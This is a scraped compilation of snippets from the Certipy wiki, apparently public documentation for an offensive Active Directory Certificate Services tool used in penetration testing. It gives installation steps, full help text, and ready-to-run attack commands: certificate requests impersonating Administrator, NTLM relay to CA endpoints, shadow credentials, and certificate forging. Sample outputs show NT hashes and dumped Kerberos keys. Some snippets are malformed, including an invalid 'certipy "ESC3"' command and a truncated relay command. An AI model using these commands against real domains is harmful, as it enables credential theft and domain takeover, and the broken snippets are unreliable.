### Setup Development Environment Source: https://github.com/ly4k/certipy/blob/main/CONTRIBUTING.md Installs Certipy in editable mode and adds development dependencies for formatting, import sorting, type checking, and linting. ```bash # Setup virtual environment python3 -m venv venv source venv/bin/activate # Install dev dependencies pip install -e . pip install -e .[dev] ``` -------------------------------- ### Certipy Find Command Output Example Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Example output from Certipy's find command, highlighting templates vulnerable to ESC2 and potential ESC2 target templates. Look for 'Any Purpose : True' or an empty Extended Key Usage list. ```text ```text Template Name: "ESC2-AnyPurpose-Template" ... (other template details) ... Extended Key Usage: - Any Purpose (2.5.29.37.0) ... (other template details) ... [+] User Enrollable Principals: - DOMAIN\User (SID: S-1-5-21-...) ... (other template details) ... Remarks: ESC2 : Template can be used for any purpose. ESC3 : Template can be used as an enrollment agent. Template Name: "Target-ClientAuth-Template" ... (other template details) ... Extended Key Usage: - Client Authentication (1.3.6.1.5.5.7.3.2) ... (other template details) ... [+] User Enrollable Principals: - DOMAIN\Domain Admins (SID: S-1-5-...) ... (other template details) ... Remarks: ESC2 Target Template : Template can be targeted as part of ESC2 exploitation. ESC3 Target Template : Template can be targeted as part of ESC3 exploitation. ``` ``` -------------------------------- ### Install Certipy via Pip (Linux/Windows) Source: https://github.com/ly4k/certipy/wiki/04-‐-Installation Installs Certipy and its dependencies from the Python Package Index. This command makes the 'certipy' command available. ```bash pip install certipy-ad ``` -------------------------------- ### Certipy Output Example Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Illustrates Certipy's output during an attack, showing certificate identities and successful authentication to an LDAP server. ```text Certipy v5.0.0 - by Oliver Lyak (ly4k) [*] Certificate identities: [*] SAN UPN: 'dc$@corp.local' [*] Security Extension SID: 'S-1-5-21-...-1108' [*] Connecting to 'ldaps://10.0.0.100:636' [*] Authenticated to '10.0.0.100' as: 'u:CORP\DC$' Type help for list of commands # whoami u:CORP\DC$ ``` -------------------------------- ### Typical Certipy Usage Flow Source: https://github.com/ly4k/certipy/wiki/05-‐-Usage This example illustrates the standard Certipy workflow for obtaining Domain Admin credentials, including acquiring a TGT and an NTLM hash. The output shows the successful retrieval of these credentials, which can then be used with other tools for privileged actions. ```bash [*] Got TGT [*] Wrote credential cache to 'Administrator.ccache' [*] Trying to retrieve NT hash for 'Administrator' [*] Got hash for 'Administrator@corp.local': aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889 ``` -------------------------------- ### Certipy Find Command Output Example Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation This output snippet from `certipy find` shows a certificate template's configuration. Look for the 'Object Control Permissions' section (not shown here) and the 'ESC4' flag to identify potential vulnerabilities. ```text Certificate Authorities 0 CA Name : CORP-CA DNS Name : CA.CORP.LOCAL ... Certificate Templates ... 0 Template Name : SecureFiles Display Name : SecureFiles Certificate Authorities : CORP-CA Enabled : True Client Authentication : False Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : False Certificate Name Flag : SubjectAltRequireUpn SubjectRequireDirectoryPath Enrollment Flag : IncludeSymmetricAlgorithms PendAllRequests PublishToDs AutoEnrollment Private Key Flag : ExportableKey Extended Key Usage : Encrypting File System Requires Manager Approval : True Requires Key Archival : False RA Application Policies : Certificate Request Agent Authorized Signatures Required : 1 Schema Version : 2 ``` -------------------------------- ### Start Certipy NTLM Relay (Default/Auto-detected Template) Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Starts Certipy in relay mode without explicitly specifying a template, allowing it to use the default or auto-detect a suitable template based on the relayed user. ```bash certipy relay -target 'https://10.0.0.50' ``` -------------------------------- ### Install Python and Pip on Debian/Ubuntu/Kali Source: https://github.com/ly4k/certipy/wiki/04-‐-Installation Installs Python 3.12+ and pip on Debian-based systems. Ensure these are present before proceeding with Certipy installation. ```bash sudo apt update && sudo apt install -y python3 python3-pip ``` -------------------------------- ### Example secretsdump.py Output Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Illustrates the expected output when secretsdump.py successfully retrieves domain credentials and Kerberos keys using a privileged ticket. ```text Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets DC$:1001:aad3b435b51404eeaad3b435b51404ee:c2ebebf4389addf861f6cb81d314d5e5::: [*] Kerberos keys grabbed DC$:aes256-cts-hmac-sha1-96:dc53532237aa43b7ee6f3e3c6f965c25f398b0b8ec4790bf51ec438125e6485a DC$:aes128-cts-hmac-sha1-96:0eb40775ee03c76fc5e20ce4a8161f6c DC$:0x17:c2ebebf4389addf861f6cb81d314d5e5 [*] Cleaning up... ``` -------------------------------- ### Verify Certipy Installation (Windows) Source: https://github.com/ly4k/certipy/wiki/04-‐-Installation Checks if Certipy is installed correctly by displaying its help message. This confirms the 'certipy' command is recognized. ```powershell certipy -h ``` -------------------------------- ### Display Command-Specific Options Source: https://github.com/ly4k/certipy/wiki/05-‐-Usage Access help for a specific sub-command to understand its options and usage. For example, to see options for the 'find' command. ```bash certipy find -h ``` -------------------------------- ### Install Build Tools and OpenSSL Dev Libraries (Debian) Source: https://github.com/ly4k/certipy/wiki/04-‐-Installation Installs necessary build tools and development libraries for Python packages like 'cryptography' on Debian-based systems. Required for resolving compilation issues during installation. ```bash apt install build-essential libssl-dev libffi-dev python3-dev ``` -------------------------------- ### Certipy Request Certificate Output Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation This is an example of the expected output when successfully requesting a certificate using Certipy. It confirms the certificate request, provides details about the obtained certificate, and indicates the saving of the certificate and private key to a .pfx file. ```text Certipy v5.0.0 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Request ID is 1 [*] Successfully requested certificate [*] Got certificate with UPN 'attacker@CORP.LOCAL' [*] Certificate object SID is 'S-1-5-21-...-1106' [*] Saving certificate and private key to 'attacker.pfx' [*] Wrote certificate and private key to 'attacker.pfx' ``` -------------------------------- ### Certipy Relay Output (Administrator User) Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Example output demonstrating a successful NTLM relay for an Administrator user, resulting in a certificate saved to a PFX file. ```text Certipy v5.0.0 - by Oliver Lyak (ly4k) [*] Targeting https://10.0.0.50/certsrv/certfnsh.asp (ESC8) [*] Listening on 0.0.0.0:445 [*] Requesting certificate for 'CORP\Administrator' based on the template 'User' [*] Certificate issued with request ID 1 [*] Retrieving certificate for request ID: 1 [*] Got certificate with UPN 'Administrator@CORP.LOCAL' [*] Certificate object SID is 'S-1-5-21-...-500' [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx' [*] Exiting... ``` -------------------------------- ### Create and Activate Virtual Environment (Windows PowerShell) Source: https://github.com/ly4k/certipy/wiki/04-‐-Installation Creates and activates a Python virtual environment on Windows using PowerShell. Ensure Python 3.12+ is installed and accessible. ```powershell py -3.12 -m venv certipy-venv certipy-venv\Scripts\Activate.ps1 ``` -------------------------------- ### Certipy Relay Output (Domain Controller) Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Example output showing a successful NTLM relay for a Domain Controller account, including certificate issuance and saving to a PFX file. ```text Certipy v5.0.0 - by Oliver Lyak (ly4k) [*] Targeting https://10.0.0.50/certsrv/certfnsh.asp (ESC8) [*] Listening on 0.0.0.0:445 [*] Requesting certificate for 'CORP\DC$' based on the template 'DomainController' [*] Certificate issued with request ID 1 [*] Retrieving certificate for request ID: 1 [*] Got certificate with DNS Host Name 'DC.CORP.LOCAL' [*] Certificate object SID is 'S-1-5-21-...-1001' [*] Saving certificate and private key to 'dc.pfx' [*] Wrote certificate and private key to 'dc.pfx' [*] Exiting... ``` -------------------------------- ### Start Certipy Relay Listener for NTLM to AD CS RPC Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Initiates Certipy to listen for incoming NTLM authentications and relay them to the specified AD CS RPC interface. Use this to capture credentials and request a certificate. ```bash certipy relay -target 'rpc://10.0.0.50' -ca 'CORP-CA' \ -template 'DomainController' ``` -------------------------------- ### Certipy Shadow Command Help Source: https://github.com/ly4k/certipy/wiki/08-‐-Command-Reference Displays the help message for the 'certipy shadow' command, outlining its usage, positional arguments, and options for manipulating Key Credential Links. ```text $ certipy shadow -h Certipy v5.0.0 - by Oliver Lyak (ly4k) usage: certipy shadow [-h] [-account target account] [-device-id device id] [-out output file name] [-dc-ip ip address] [-dc-host hostname] [-target-ip ip address] [-target dns/ip address] [-ns ip address] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [lmhash:]nthash] [-k] [-aes hex key] [-no-pass] [-ldap-scheme ldap scheme] [-ldap-port port] [-no-ldap-channel-binding] [-no-ldap-signing] [-ldap-simple-auth] [-ldap-user-dn dn] {list,add,remove,clear,info,auto} Manipulate Key Credential Links (Shadow Credentials) on Active Directory accounts. This allows for account takeover by adding or modifying Key Credential Links. positional arguments: {list,add,remove,clear,info,auto} Operation to perform on Key Credential Links: list (view all), add (create new), remove (delete specific), clear (remove all), info (display detailed information), auto (automatically exploit) options: -h, --help show this help message and exit account options: -account target account Account to target. If omitted, the user specified in the target will be used -device-id device id Device ID of the Key Credential Link to target output options: -out output file name Output file for saving certificate or results connection options: -dc-ip ip address IP address of the domain controller. If omitted, it will use the domain part (FQDN) specified in the target parameter -dc-host hostname Hostname of the domain controller. Required for Kerberos authentication during certain operations. If omitted, the domain part (FQDN) specified in the account parameter will be used -target-ip ip address IP address of the target machine. If omitted, it will use whatever was specified as target. Useful when target is the NetBIOS name and cannot be resolved -target dns/ip address DNS name or IP address of the target machine. Required for Kerberos authentication -ns ip address Nameserver for DNS resolution -dns-tcp Use TCP instead of UDP for DNS queries -timeout seconds Timeout for connections in seconds (default: 10) authentication options: -u username@domain, -username username@domain Username to authenticate with -p password, -password password Password for authentication -hashes [lmhash:]nthash NTLM hash -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -aes hex key AES key to use for Kerberos Authentication (128 or 256 bits) -no-pass Don't ask for password (useful for -k) ldap options: -ldap-scheme ldap scheme LDAP connection scheme to use (default: ldaps) -ldap-port port Port for LDAP communication (default: 636 for ldaps, 389 for ldap) -no-ldap-channel-binding Don't use LDAP channel binding for LDAP communication (LDAPS only) -no-ldap-signing Don't use LDAP signing for LDAP communication (LDAP only) -ldap-simple-auth Use SIMPLE LDAP authentication instead of NTLM -ldap-user-dn dn Distinguished Name of target account for LDAP authentication ``` -------------------------------- ### Authenticate with a Certificate Source: https://github.com/ly4k/certipy/wiki/05-‐-Usage Use 'auth' for pass-the-certificate authentication. Given a PFX file, it performs domain authentication (Kerberos PKINIT) and can retrieve a TGT and NTLM hash, or use Schannel for LDAP authentication. ```bash certipy auth -pfx ``` -------------------------------- ### Upgrade Certipy via Pip Source: https://github.com/ly4k/certipy/wiki/04-‐-Installation Upgrades Certipy to the latest available version from PyPI. This command fetches and installs the newest release. ```bash pip install -U certipy-ad ``` -------------------------------- ### Certipy Auth Help Source: https://github.com/ly4k/certipy/wiki/08-‐-Command-Reference Displays help information for the `certipy auth` command, detailing options for certificate-based authentication to Active Directory services. ```text $ certipy auth -h Certipy v5.0.0 - by Oliver Lyak (ly4k) usage: certipy auth [-h] -pfx pfx/p12 file name [-password password] [-no-save] [-no-hash] [-print] [-kirbi] [-dc-ip ip address] [-ns nameserver] [-dns-tcp] [-timeout seconds] [-username username] [-domain domain] [-ldap-shell] [-ldap-scheme ldap scheme] [-ldap-port port] [-ldap-user-dn dn] Authenticate to Active Directory services using certificates. This command enables certificate-based authentication to obtain Kerberos tickets, NT hashes, or establish LDAP connections. options: -h, --help show this help message and exit certificate options: -pfx pfx/p12 file name Path to certificate and private key (PFX/P12 format) -password password Password for the PFX/P12 file output options: -no-save Don't save Kerberos TGT to file -no-hash Don't request NT hash from Kerberos -print Print Kerberos TGT in Kirbi format to console -kirbi Save Kerberos TGT in Kirbi format (default is ccache) connection options: -dc-ip ip address IP Address of the domain controller. If omitted, it will use the domain part (FQDN) specified in the target parameter -ns nameserver Nameserver for DNS resolution -dns-tcp Use TCP instead of UDP for DNS queries -timeout seconds Timeout for connections in seconds authentication options: -username username Username to authenticate as (extracted from certificate if omitted) -domain domain Domain name to authenticate to (extracted from certificate if omitted) -ldap-shell Authenticate with the certificate via Schannel against LDAP ldap options: -ldap-scheme ldap scheme LDAP connection scheme to use (default: ldaps) -ldap-port port Port for LDAP communication (default: 636 for ldaps, 389 for ldap) -ldap-user-dn dn Distinguished Name of target account for LDAP authentication ``` -------------------------------- ### Certipy Global Options Help Source: https://github.com/ly4k/certipy/wiki/08-‐-Command-Reference Displays the help message for Certipy, outlining global options and available actions. Use this to understand the tool's basic usage and command structure. ```text $ certipy -h Certipy v5.0.0 - by Oliver Lyak (ly4k) usage: certipy [-v] [-h] [-debug] {account,auth,ca,cert,find,parse,forge,relay,req,shadow,template} ... Active Directory Certificate Services enumeration and abuse positional arguments: {account,auth,ca,cert,find,parse,forge,relay,req,shadow,template} Action account Manage user and machine accounts auth Authenticate using certificates ca Manage CA and certificates cert Manage certificates and private keys find Enumerate AD CS parse Offline enumerate AD CS based on registry data forge Create Golden Certificates or self-signed certificates relay NTLM Relay to AD CS HTTP Endpoints req Request certificates shadow Abuse Shadow Credentials for account takeover template Manage certificate templates options: -v, --version Show Certipy's version number and exit -h, --help Show this help message and exit -debug, --debug Enable debug output ``` -------------------------------- ### Certipy Cert Help Source: https://github.com/ly4k/certipy/wiki/08-‐-Command-Reference Displays help information for the `certipy cert` command, detailing options for importing, exporting, and manipulating certificates and private keys. ```text $ certipy cert -h Certipy v5.0.0 - by Oliver Lyak (ly4k) usage: certipy cert [-h] [-pfx infile] [-password password] [-key infile] [-cert infile] [-export] [-out outfile] [-nocert] [-nokey] [-export-password password] Import, export, and manipulate certificates and private keys locally. This command supports various operations like converting between formats, extracting components, and creating PFX files. options: -h, --help show this help message and exit input options: -pfx infile Load certificate and private key from PFX/P12 file -password password Password for the input PFX/P12 file -key infile Load private key from PEM or DER file -cert infile Load certificate from PEM or DER file output options: -export Export to PFX/P12 file (default format) -out outfile Output filename for the exported certificate/key -nocert Don't include certificate in output (key only) -nokey Don't include private key in output (certificate only) -export-password password Password to protect the output PFX/P12 file ``` -------------------------------- ### Certipy Template Command Help Source: https://github.com/ly4k/certipy/wiki/08-‐-Command-Reference Displays the help message for the `certipy template` command, outlining its usage, available options, and parameters for manipulating certificate templates in Active Directory. ```text $ certipy template -h Certipy v5.0.0 - by Oliver Lyak (ly4k) usage: certipy template [-h] -template template name [-write-configuration configuration file] [-write-default-configuration] [-save-configuration configuration file] [-no-save] [-force] [-dc-ip ip address] [-dc-host hostname] [-target-ip ip address] [-target dns/ip address] [-ns ip address] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [lmhash:]nthash] [-k] [-aes hex key] [-no-pass] [-ldap-scheme ldap scheme] [-ldap-port port] [-no-ldap-channel-binding] [-no-ldap-signing] [-ldap-simple-auth] [-ldap-user-dn dn] Manipulate certificate templates in Active Directory. This command allows viewing and modifying template configurations for privilege escalation testing or remediation. options: -h, --help show this help message and exit -template template name Name of the certificate template to operate on (case-sensitive) configuration options: -write-configuration configuration file Apply configuration from a JSON file to the certificate template. Use this option to restore a previous configuration or apply custom settings. The file should contain the template configuration in valid JSON format. -write-default-configuration Apply the default Certipy ESC1 configuration to the certificate template. This configures the template to be vulnerable to ESC1 attack. -save-configuration configuration file Save the current template configuration to a JSON file. This creates a backup before making changes or documents the current settings. If not specified when using -write-configuration or -write-default-configuration, a backup will still be created. -no-save Skip saving the current template configuration before applying changes. Use this option to apply modifications without creating a backup file. -force Don't prompt for confirmation before applying changes. Use this option to apply modifications without user interaction. connection options: -dc-ip ip address IP address of the domain controller. If omitted, it will use the domain part (FQDN) specified in the target parameter -dc-host hostname Hostname of the domain controller. Required for Kerberos authentication during certain operations. If omitted, the domain part (FQDN) specified in the account parameter will be used -target-ip ip address IP address of the target machine. If omitted, it will use whatever was specified as target. Useful when target is the NetBIOS name and cannot be resolved -target dns/ip address DNS name or IP address of the target machine. Required for Kerberos authentication -ns ip address Nameserver for DNS resolution -dns-tcp Use TCP instead of UDP for DNS queries -timeout seconds Timeout for connections in seconds (default: 10) authentication options: -u username@domain, -username username@domain Username to authenticate with -p password, -password password Password for authentication -hashes [lmhash:]nthash NTLM hash -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -aes hex key AES key to use for Kerberos Authentication (128 or 256 bits) -no-pass Don't ask for password (useful for -k) ldap options: -ldap-scheme ldap scheme LDAP connection scheme to use (default: ldaps) -ldap-port port Port for LDAP communication (default: 636 for ldaps, 389 for ldap) -no-ldap-channel-binding Don't use LDAP channel binding for LDAP communication (LDAPS only) -no-ldap-signing Don't use LDAP signing for LDAP communication (LDAP only) -ldap-simple-auth Use SIMPLE LDAP authentication instead of NTLM -ldap-user-dn dn Distinguished Name of target account for LDAP authentication ``` -------------------------------- ### Certipy Parse Command Help Source: https://github.com/ly4k/certipy/wiki/08-‐-Command-Reference Displays help information for the 'certipy parse' command, outlining its usage, positional arguments, and various output, parse, filter, and domain options. ```text $ certipy parse -h Certipy v5.0.0 - by Oliver Lyak (ly4k) usage: certipy parse [-h] [-text] [-stdout] [-json] [-csv] [-output prefix] [-format format] [-domain domain name] [-ca ca name] [-sids sids] [-published templates] [-enabled] [-vulnerable] [-hide-admins] file Parse and analyze certificate templates from exported registry data. This allows assessment of AD CS security without direct domain access. positional arguments: file File to parse (BOF output or .reg file from registry export) options: -h, --help show this help message and exit output options: -text Output result as formatted text file -stdout Output result as text directly to console -json Output result as JSON -csv Output result as CSV -output prefix Filename prefix for writing results to parse options: -format format Input format: BOF output or Windows .reg file (default: bof) -domain domain name Domain name. Only used for output context (default: UNKNOWN) -ca ca name CA name. Only used for output context (default: UNKNOWN) -sids sids Consider the comma separated list of SIDs as owned for vulnerability assessment -published templates Consider the comma separated list of template names as published in AD filter options: -enabled Show only enabled certificate templates -vulnerable Show only vulnerable certificate templates based on nested group memberships -hide-admins Don't show administrator permissions for -text, -stdout, -json, and -csv output ``` -------------------------------- ### Certipy Relay Initial Output Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation The expected output when Certipy starts listening for incoming SMB connections to relay authentication. It indicates the target endpoint and the listening port. ```text Certipy v5.0.0 - by Oliver Lyak (ly4k) [*] Targeting https://10.0.0.50/certsrv/certfnsh.asp (ESC8) [*] Listening on 0.0.0.0:445 [*] Setting up SMB Server on port 445 ``` -------------------------------- ### Authenticate with Obtained Certificate Source: https://github.com/ly4k/certipy/wiki/05-‐-Usage Use 'certipy auth' with a generated .pfx file to authenticate as the target user. This command performs PKINIT to obtain a Kerberos TGT and may also retrieve the NTLM hash. ```bash certipy auth -pfx 'administrator.pfx' -dc-ip '10.0.0.100' ``` ```text [*] Certificate identities: SAN UPN: 'Administrator@corp.local' Security Extension SID: 'S-1-5-21-...-500' [*] Using principal: 'Administrator@corp.local' [*] Trying to get TGT... ``` -------------------------------- ### Start Certipy NTLM Relay for RPC Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Initiates Certipy's NTLM relay mode targeting the Certificate Authority's RPC interface. Requires specifying the CA's IP/hostname and name. ```bash certipy relay \ ``` -------------------------------- ### Create and Activate Virtual Environment (Linux) Source: https://github.com/ly4k/certipy/wiki/04-‐-Installation Creates and activates a Python virtual environment. This is recommended to avoid dependency conflicts with system Python packages. ```bash python3 -m venv certipy-venv source certipy-venv/bin/activate ``` -------------------------------- ### Start Certipy NTLM Relay (Domain Controller Template) Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Initiates Certipy in relay mode, targeting a specific web enrollment endpoint and using the 'DomainController' template. This is common when relaying a Domain Controller account. ```bash certipy relay \ -target 'https://10.0.0.50' -template 'DomainController' ``` -------------------------------- ### Identify ESC16 Vulnerability with Certipy Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Use the Certipy 'find' command to check if a Certificate Authority (CA) has the Security Extension (OID 1.3.6.1.4.1.311.25.2) listed in its 'Disabled Extensions'. This output snippet shows an example of what to look for. ```text Certificate Authorities 0 CA Name : CORP-CA DNS Name : CA.CORP.LOCAL ... Request Disposition : Issue ... Disabled Extensions : 1.3.6.1.4.1.311.25.2 ... Permissions Access Rights ... Enroll : CORP.LOCAL\Authenticated Users [+] User Enrollable Principals : CORP.LOCAL\Authenticated Users [!] Vulnerabilities ESC16 : Security Extension is disabled. [*] Remarks ``` -------------------------------- ### Request Enrollment Agent Certificate with Certipy Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Use this command to request an Enrollment Agent certificate for the attacker's user account from a misconfigured template. The output .pfx file contains the agent certificate and its private key. ```bash certipy req \ -u 'attacker@corp.local' -p 'Passw0rd!' \ -dc-ip '10.0.0.100' -target 'CA.CORP.LOCAL' \ -ca 'CORP-CA' -template 'EnrollAgent' ``` -------------------------------- ### Authenticating as Target User with Obtained Certificate Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation After obtaining a certificate with the target's identity, use 'certipy auth' with the generated PFX file to authenticate to the domain as the target user. ```bash certipy auth -pfx 'administrator.pfx' -dc-ip '10.0.0.100' ``` -------------------------------- ### Certipy Account Command Help Source: https://github.com/ly4k/certipy/wiki/08-‐-Command-Reference Displays the help message for the `certipy account` command, outlining its usage, positional arguments, and options for managing Active Directory accounts. ```text $ certipy account -h Certipy v5.0.0 - by Oliver Lyak (ly4k) usage: certipy account [-h] -user SAM Account Name [-group CN=Computers,DC=test,DC=local] [-dns hostname] [-upn principal name] [-sam account name] [-spns service names] [-pass password] [-dc-ip ip address] [-dc-host hostname] [-target-ip ip address] [-target dns/ip address] [-ns ip address] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [lmhash:]nthash] [-k] [-aes hex key] [-no-pass] [-ldap-scheme ldap scheme] [-ldap-port port] [-no-ldap-channel-binding] [-no-ldap-signing] [-ldap-simple-auth] [-ldap-user-dn dn] {create,read,update,delete} Create, read, update, and delete Active Directory user and computer accounts. This command allows manipulating account properties including DNS names, service principal names (SPNs), and passwords. positional arguments: {create,read,update,delete} Action to perform: create (new account), read (view account properties), update (modify existing account), delete (remove account) options: -h, --help show this help message and exit target options: -user SAM Account Name Logon name for the account to target -group CN=Computers,DC=test,DC=local Group to which the account will be added. If omitted, CN=Computers, will be used attribute options: -dns hostname Set the DNS hostname for the account (e.g., computer.domain.local) -upn principal name Set the User Principal Name for the account (e.g., user@domain.local) -sam account name Set the SAM Account Name for the account (e.g., computer$ or username) -spns service names Set the Service Principal Names for the account (comma-separated) -pass password Set the password for the account connection options: -dc-ip ip address IP address of the domain controller. If omitted, it will use the domain part (FQDN) specified in the target parameter -dc-host hostname Hostname of the domain controller. Required for Kerberos authentication during certain operations. If omitted, the domain part (FQDN) specified in the account parameter will be used -target-ip ip address IP address of the target machine. If omitted, it will use whatever was specified as target. Useful when target is the NetBIOS name and cannot be resolved -target dns/ip address DNS name or IP address of the target machine. Required for Kerberos authentication -ns ip address Nameserver for DNS resolution -dns-tcp Use TCP instead of UDP for DNS queries -timeout seconds Timeout for connections in seconds (default: 10) authentication options: -u username@domain, -username username@domain Username to authenticate with -p password, -password password Password for authentication -hashes [lmhash:]nthash NTLM hash -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -aes hex key AES key to use for Kerberos Authentication (128 or 256 bits) -no-pass Don't ask for password (useful for -k) ldap options: -ldap-scheme ldap scheme LDAP connection scheme to use (default: ldaps) -ldap-port port Port for LDAP communication (default: 636 for ldaps, 389 for ldap) -no-ldap-channel-binding Don't use LDAP channel binding for LDAP communication (LDAPS only) -no-ldap-signing Don't use LDAP signing for LDAP communication (LDAP only) -ldap-simple-auth Use SIMPLE LDAP authentication instead of NTLM -ldap-user-dn dn Distinguished Name of target account for LDAP authentication ``` -------------------------------- ### Request 'Any Purpose' Certificate with Certipy Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation Use this command to request a certificate from a misconfigured 'Any Purpose' template. This certificate can then be used as an enrollment agent certificate for further exploitation. Ensure you replace placeholders with your specific domain, user, and CA details. ```bash certipy req \ -u 'attacker@corp.local' -p 'Passw0rd!' \ -dc-ip '10.0.0.100' -target 'CA.CORP.LOCAL' \ -ca 'CORP-CA' -template 'AnyPurposeCert' ``` -------------------------------- ### Certipy Forge Command Help Source: https://github.com/ly4k/certipy/wiki/08-‐-Command-Reference Displays help information for the 'certipy forge' command, detailing its usage for creating certificates, including options for CA certificates, subject alternative names, certificate content, key size, validity, and output. ```text $ certipy forge -h Certipy v5.0.0 - by Oliver Lyak (ly4k) usage: certipy forge [-h] [-ca-pfx pfx/p12 file name] [-ca-password password] [-upn alternative UPN] [-dns alternative DNS] [-sid alternative Object SID] [-subject subject] [-template pfx/p12 file name] [-issuer issuer] [-crl ldap path] [-serial serial number] [-application-policies Application Policy [Application Policy ...]] [-smime encryption algorithm] [-key-size RSA key length] [-validity-period days] [-out output file name] [-pfx-password password] Forge certificates using a compromised CA certificate or generate a self-signed CA. This allows creating certificates for any identity in the domain or creating standalone certificate chains. options: -h, --help show this help message and exit -ca-pfx pfx/p12 file name Path to CA certificate and private key (PFX/P12 format). If not specified, a self-signed root CA will be generated -ca-password password Password for the CA PFX file subject alternative name options: -upn alternative UPN User Principal Name to include in the Subject Alternative Name -dns alternative DNS DNS name to include in the Subject Alternative Name -sid alternative Object SID Object SID to include in the Subject Alternative Name -subject subject Subject to include in certificate, e.g. CN=Administrator,CN=Users,DC=CORP,DC=LOCAL certificate content options: -template pfx/p12 file name Path to template certificate to clone properties from -issuer issuer Issuer to include in certificate. If not specified, the issuer from the CA cert will be used -crl ldap path LDAP path to a CRL distribution point -serial serial number Custom serial number for the certificate -application-policies Application Policy [Application Policy ...] Specify application policies for the certificate request using OIDs (e.g., '1.3.6.1.4.1.311.10.3.4' or 'Client Authentication') -smime encryption algorithm Specify SMIME Extension that gets added to CSR (e.g., des, rc4, 3des, aes128, aes192, aes256) key options: -key-size RSA key length Length of RSA key (default: 2048) validity options: -validity-period days Validity period in days (default: 365) output options: -out output file name Path to save the forged certificate and private key (PFX format) -pfx-password password Password to protect the output PFX file ``` -------------------------------- ### Requesting an Enrollment Agent Certificate Source: https://github.com/ly4k/certipy/wiki/06-‐-Privilege-Escalation This command requests a certificate for the Administrator account using Certipy. It saves the certificate and private key to a PFX file. ```bash certipy "ESC3" -ca 'CORP-CA-DC01\CORP-CA' -template 'Enrollment Agent' -upn 'Administrator@CORP.LOCAL' -sid 'S-1-5-21-...-500' ``` -------------------------------- ### Certipy Auth with Shadow Credential PFX Source: https://github.com/ly4k/certipy/wiki/07-‐-Post‐Exploitation Authenticates using a PFX file generated by 'certipy shadow add'. Requires username and domain to specify the target account context. ```bash certipy auth \ -dc-ip '10.0.0.100' -pfx 'victim.pfx' \ -username 'victim' -domain 'corp.local' ``` -------------------------------- ### Basic Certipy Invocation Source: https://github.com/ly4k/certipy/wiki/05-‐-Usage The fundamental structure for running Certipy commands, including global options, the command itself, and command-specific options. ```bash certipy [global options] [command options] ``` -------------------------------- ### Certipy Request Command Help Source: https://github.com/ly4k/certipy/wiki/08-‐-Command-Reference Displays the help message for the 'certipy req' command, outlining all available options for requesting and retrieving certificates. ```text $ certipy req -h Certipy v5.0.0 - by Oliver Lyak (ly4k) usage: certipy req [-h] [-ca certificate authority name] [-template template name] [-upn alternative UPN] [-dns alternative DNS] [-sid alternative Object SID] [-subject subject] [-retrieve request ID] [-on-behalf-of domain\account] [-pfx pfx/p12 file name] [-pfx-password PFX file password] [-key-size RSA key length] [-archive-key] [-cax-cert] [-renew] [-application-policies Application Policy [Application Policy ...]] [-smime encryption algorithm] [-out output file name] [-web] [-dcom] [-dynamic-endpoint] [-http-scheme http scheme] [-http-port port number] [-no-channel-binding] [-dc-ip ip address] [-dc-host hostname] [-target-ip ip address] [-target dns/ip address] [-ns ip address] [-dns-tcp] [-timeout seconds] [-u username@domain] [-p password] [-hashes [lmhash:]nthash] [-k] [-aes hex key] [-no-pass] [-ldap-scheme ldap scheme] [-ldap-port port] [-no-ldap-channel-binding] [-no-ldap-signing] [-ldap-simple-auth] [-ldap-user-dn dn] Request and retrieve certificates from AD CS. This command supports multiple enrollment protocols and certificate template types. options: -h, --help show this help message and exit -ca certificate authority name Name of the Certificate Authority to request certificates from. Required for RPC and DCOM methods certificate request options: -template template name Certificate template to request (default: User) -upn alternative UPN User Principal Name to include in the Subject Alternative Name -dns alternative DNS DNS name to include in the Subject Alternative Name -sid alternative Object SID Object SID to include in the Subject Alternative Name -subject subject Subject to include in certificate, e.g. CN=Administrator,CN=Users,DC=CORP,DC=LOCAL -retrieve request ID Retrieve an issued certificate specified by a request ID instead of requesting a new certificate -on-behalf-of domain\account Use a Certificate Request Agent certificate to request on behalf of another user -pfx pfx/p12 file name Path to PFX for -on-behalf-of or -renew -pfx-password PFX file password Password for the PFX file -key-size RSA key length Length of RSA key (default: 2048) -archive-key Send private key for Key Archival -cax-cert Retrieve CAX Cert for relay with enabled Key Archival -renew Create renewal request -application-policies Application Policy [Application Policy ...] Specify application policies for the certificate request using OIDs (e.g., '1.3.6.1.4.1.311.10.3.4' or 'Client Authentication') -smime encryption algorithm Specify SMIME Extension that gets added to CSR (e.g., des, rc4, 3des, aes128, aes192, aes256) output options: -out output file name Path to save the certificate and private key (PFX format) connection options: -web Use Web 